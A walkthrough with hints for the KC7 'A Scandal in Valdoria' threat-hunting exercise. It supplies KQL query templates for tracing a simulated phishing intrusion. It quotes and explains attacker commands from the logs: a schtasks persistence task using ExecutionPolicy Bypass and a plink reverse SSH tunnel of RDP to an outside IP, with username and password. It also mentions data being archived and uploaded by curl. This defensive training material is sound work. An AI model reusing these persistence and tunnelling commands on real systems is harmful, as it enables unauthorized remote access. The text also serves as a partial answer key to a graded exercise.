This post is a write-up or clues on how to resolve the KC7 investigation case of A Scandal in Valdoria . You can use it as a helpful guide when you encounter an obstacle, as it structured as a fill-in-the-blanks solution.

Section 2: Welcome to Valdoria!

Question 1: What is the Newspaper Printer’s name?

Clark Kent

Question 2: What is the Editorial Intern’s name?

Employees
| where <field> == "Editorial Intern"

Question 3: When was the Editorial Intern hired at The Valdorian Times?

Answer from question 2.

Employees
| where <field> == "Editorial Intern"

Question 4: How many total emails has Clark Kent received?

  1. Find Kent’s email address
Employees
| where <field> <operator> "Clark Kent"
  1. Get the count of emails.
Email
| where <field> <operator> "<Clark Kent Email address>"
| <operator>

Question 5: What was the subject line of this email?

Question 6: Enter the sender’s email address.

This query will provide the required data to continue the investigation by answering questions 5 and 6. Use the query from question 4 without the last operator count 🫣. The question provided us with the date when the email was sent to Clark Kent on January 31, 2024.

Email
| where <field> <operator> "<Clark Kent Email address>"
| where timestamp between (datetime('2024-01-31T00:00:00Z') ..datetime('2024-01-31T23:59:59') )

Question 7: What was the name of the .docx file that was sent in this email?

Use the same query above to answer this question. It is asking for the file name not the full link.

Question 8: Do you think this needs further investigation (yes/no)? Choose wisely 😉

Yes

Section 3: Plenty of Phish

Question 1: What is Sonia’s job role?

Table
| where <field> <operator> "Sonia Gose"

Question 2: What email address was used to send this email?

Type the email address newspaper_jobs@gmail.com.

Question 3: When was the email sent to Sonia Gose? Enter the exact timestamp from the logs.

The sender’s email address was provided to us in question number 2. Also, we have Sonia Gose from the Employee table.

Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">

Question 4: What URL was included in the email?

Answer from question 3.

Question 5: What is Sonia Gose’s IP address?

Answer from question 1.

Table
| where <field> <operator> "Sonia Gose"
Table
| where <field> <operator> <Sonia Gose's IP address>
and <field> <operator> <URL> //Q4

Just the file name not the full link in the answer to question 4.

Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">

Question 8: What is Sonia Gose’s hostname?

Table
| where <field> <operator> "Sonia Gose"

Question 9: When did the downloaded docx file first show up on Sonia’s machine?

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 10: What was the full path of the docx file that was downloaded to Sonia’s machine?

Answer from question 9.

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 11: What is the sha256 hash of the file that Sonia downloaded?

Answer from question 9.

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 12: What is the name of the file (.ps1) that was written to disk immediately after the docx was downloaded?

Only the file name.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000) //timestamp after the event

Question 13: When was this new file created?

Timestamp from answer to question 12.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000)

Question 14: Let’s do some research! What type of file is this?

Use your Google-Fu skills!

Question 15: What does the attacker say to “let you know they are here”?

Lol! Do you see it 😄.

Question 16: According to the PowerShell script, what might be the hacker’s favorite color?

It is in the image from question 15.

Question 17: The purpose of the script is to invoke ____ and uncover da truth

It is in the image from question 15.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"
| count

Question 19: What is the full command used to create the scheduled task?

From question 18. Do you see it? It is in task scheduler.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"

Question 20: What ExecutionPolicy is set in the command?

The policy will allow the script to run without restrictions.

This PowerShell command is using schtasks to create a scheduled task in Windows. Here is a breakdown of the command and what each part does:

  1. schtasks: This is a command-line tool in Windows used to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.

  2. /create: This flag tells schtasks that you want to create a new scheduled task.

  3. /sc hourly: This parameter specifies the schedule type for the task. In this case, hourly indicates that the task should run every hour.

  4. /mo 5: This modifies the schedule set by /sc. Here, it means the task will run every 5 hours.

  5. /tn "Hacktivist Manifesto": This sets the name of the task. The task will be identified in the Task Scheduler as “Hacktivist Manifesto”.

  6. /tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1": This sets the action that the task will execute. Here, it runs powershell.exe with the specified parameters:

  • -ExecutionPolicy Bypass: This bypasses the PowerShell execution policy, allowing the script to run without restrictions.
  • -File C:\ProgramData\hacktivist_manifesto.ps1: This specifies the path to the PowerShell script that should be executed.

In summary, this command creates a scheduled task named “Hacktivist Manifesto” that runs a PowerShell script located at C:\ProgramData\hacktivist_manifesto.ps1 every 5 hours, bypassing any execution policy restrictions.

ProcessEvents
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "plink.exe"

The plink.exe is a command-line interface to the PuTTY back ends.

  1. plink.exe: This is the command-line interface to the PuTTY SSH client.

  2. -R 3389:localhost:3389: This sets up a reverse SSH tunnel. Here’s what each part means:

  • -R: This specifies a reverse tunnel.
  • 3389:localhost:3389: This maps port 3389 on the remote machine to port 3389 on the local machine. Port 3389 is commonly used for Remote Desktop Protocol (RDP).
  1. -ssh: This tells plink.exe to use the SSH protocol for the connection.

  2. -l $had0w: This specifies the username to log in as on the remote machine. In this case, $had0w.

  3. -pw thruthW!llS3tUfree: This specifies the password for the user $had0w.

  4. 136.130.190.181: This is the IP address of the remote machine to which you are connecting.

This command sets up a reverse SSH tunnel from the local machine to the remote machine at IP address 136.130.190.181 using the username $had0w** and the password thruthW!llS3tUfree. It maps port 3389 on the remote machine to port 3389 on the local machine. This allows you to connect to the Remote Desktop service on the local machine via the remote machine’s IP address and port 3389. Essentially, you can use this to remotely access the local machine’s desktop environment through the remote machine.

Answer from question 21.

Answer from question 21.

Question 24: What six-letter command did the attackers run to figure out which user they are logged on as on the computer?

The timestamp from answer question 21.

ProcessEvents
| where hostname == "<Sonia Gose's Hostname>"
| where timestamp >= datetime(2024-01-06 02:39:35)

Question 25: How many discovery commands did the attackers run on this machine?

Answer from question 24. Check MITRE ATT&amp;CK ID: T1018

Question 26: Do you think we can safely stop our investigation here? (yes/no)

🤔

Section 4: A Scandal  

Question 1: How many total emails were sent by this email sender to users at The Valdorian Times?

Table
| where <field> <operator> "valdorias_best_recruiter@gmail.com"
| count 

Question 2: When did valdorias_best_recruiter@gmail.com send an email to Ronnie McLovin?

KC7 A Scandal in Valdoria - Section 2: Welcome to Valdoria! Question 6. . Also, we can find the email address of Ronnie McLovin by checking the Employees table.

Table
| where <field> <operator> "valdorias_best_recruiter@gmail.com"
| where <field> <operator> "<Email from Section 2 Question 6>"
Table
| where <field> <operator> "valdorias_best_recruiter@gmail.com"
| where <field> <operator> "<Email from Section 2 Question 6>"

KC7 A Scandal in Valdoria - Section 2: Welcome to Valdoria! Question 6. .

Question 4: What was the subject of that email?

Table
| where <field> <operator> "valdorias_best_recruiter@gmail.com"
| where <field> <operator> "<Email from Section 2 Question 6>"

KC7 A Scandal in Valdoria - Section 2: Welcome to Valdoria! Question 6. .

We know the domain of the phishing website from question 3. To narrow our search, we will run the following query:

search "<Answer from question 3>"
| distinct $table

The results are in tables Email and OutboundNetworkEvents. After reviewing the columns in both tables, we can identify column src_ip in the OutboundNetworkEvents table. Then, from the Employees table, we can find Donnie McLovin’s IP address by running the following:

Table
| where <field> <operator> "Ronnie McLovin"

Then, search for Ronnie McLovin’s IP address in the src_ip and link in url columns.

Table
| where <field> <operator> "<Ronnie McLovin's ip_addr>" and url contains "<Answer from question 3>"

Question 6: What was the name of the .docx file that was downloaded to Ronnie’s machine?

Answer from question 5.

Question 7: When was this docx file downloaded?

Start looking at the available tables and columns in the ValdyTime database. We need to get the query using the hostname or username, which we can obtain from the Employees table.

Employees
| where <field> <operator> "Ronnie McLovin"
Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "Editorial_J0b_Openings_2024.docx"

Question 8: When was the .ps1 file dropped to Ronnie’s machine?

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"

KC7 A Scandal in Valdoria - Section 3: Plenty of Phish Question 12.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "plink"

Answer from question 9 in the process_commandline column.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "plink"

Answer from question 9 in the process_commandline column.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "plink"

Question 12: How many discovery commands were run on Ronnie’s machine?

Check MITRE ATT&amp;CK ID: T1018 I used the timestamp >= with datetime (2024-01-10T08:55:51Z), which is the time of running the file C:\ProgramData\hacktivist_manifesto.ps1.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where timestamp >= datetime(2024-01-10T08:55:51Z)

Question 13: What is Ronnie’s IP address?

We saw that in the Employees table.

Table
| where <field> <operator> "Ronnie McLovin"

Question 14: What is the full URL fakestory.docx was downloaded from?

Table
| where <field> <operator> "fakestory.docx"

Question 15: What is Ronnie’s hostname?

Table
| where <field> <operator> "fakestory.docx"

Question 16: What is the sha256 hash of fakestory.docx on Ronnie’s machine?

Table
| where <field> <operator> "fakestory.docx"

Question 17: When was fakestory.docx created on Ronnie’s machine?

Table
| where <field> <operator> "fakestory.docx"

Question 18: What is the new path for the document?

The question provided us with the file that was downloaded: fakestory.docx. Let’s perform a search for the file name.

search "fakestory.docx"

Our flag is in the process_commandline.

Other ways to get our flag would be to check the timeline after discovery commands or use the hostname and the filename to find the command.

Question 19: When was this command executed to rename and move the file?

Answer from question 18.

Question 20: When was OpEdFinal_to_print.docx emailed from Ronnie’s account to Clark Kent?

Table
| where <field> <operator> "OpEdFinal_to_print.docx"

Question 21: How many minutes elapsed between when the file was moved/renamed on Ronnie machine and when the email was sent to Clark Kent?

Perform a time calculation for the events timestamp from question 19 and question 20.

Question 22: What was the subject line of this email?

Table
| where <field> <operator> "OpEdFinal_to_print.docx"

Question 23: Do you think this is the only thing the attackers did on Ronnie’s machine? (yes/no)

It wouldn’t be fun if it was yes!

Question 24: What is the domain mentioned in this alert?

In red!

Question 25: How many total commands were run in this timeframe?

Table
| where <field> <operator> (datetime(2024-01-21 07:00:00) .. datetime(2024-01-21 12:00:00))
| where hostname == "<Ronnie's Hostname>"
| order by timestamp asc

Question 26: What is the name of the .7z file that contains the stolen memes?

Investigate the process_commandline.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where process_commandline contains "7z"

Question 27: What is the name of the .7z file that contains files stolen from Ronnie’s Documents folder?

Investigate the process_commandline.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "7z"

Question 28: What is the name of the .7z file that contains files stolen from Ronnie’s Desktop folder?

Investigate the process_commandline.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "7z"

Question 29: What is the password the attackers used to encrypt all of the .7z files?

Investigate the process_commandline.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "7z"

Question 30: What is the full command the attackers ran to do this?

Investigate the process_commandline.

Table
| where <field> <operator> "<Ronnie's Hostname>"
| where <field> <operator> "7z"

CURL

Question 31: What domain was the stolen data uploaded to?

Investigate the process_commandline.

Table
| where hostname <operator> "<Ronnie's Hostname>"
| where process_commandline contains "7z"

CURL

Question 32: Was data stolen from any other devices and uploaded to hirejob.com? (yes/no)

Try searching by the domain from the answer to question 31

ProcessEvents
| where <field> <operator> "hirejob.com"
| where hostname != "<Ronnie's Hostname>"

Question 33: Type “wooo” to receive credit

wooo

Question 34: Type “shadows” to finish this module. Stay tuned for the next module to learn more about what’s lurking in the shadows 😱

shadows

Community Help

Join Discord to discuss the module KC7 Discord #valdoria .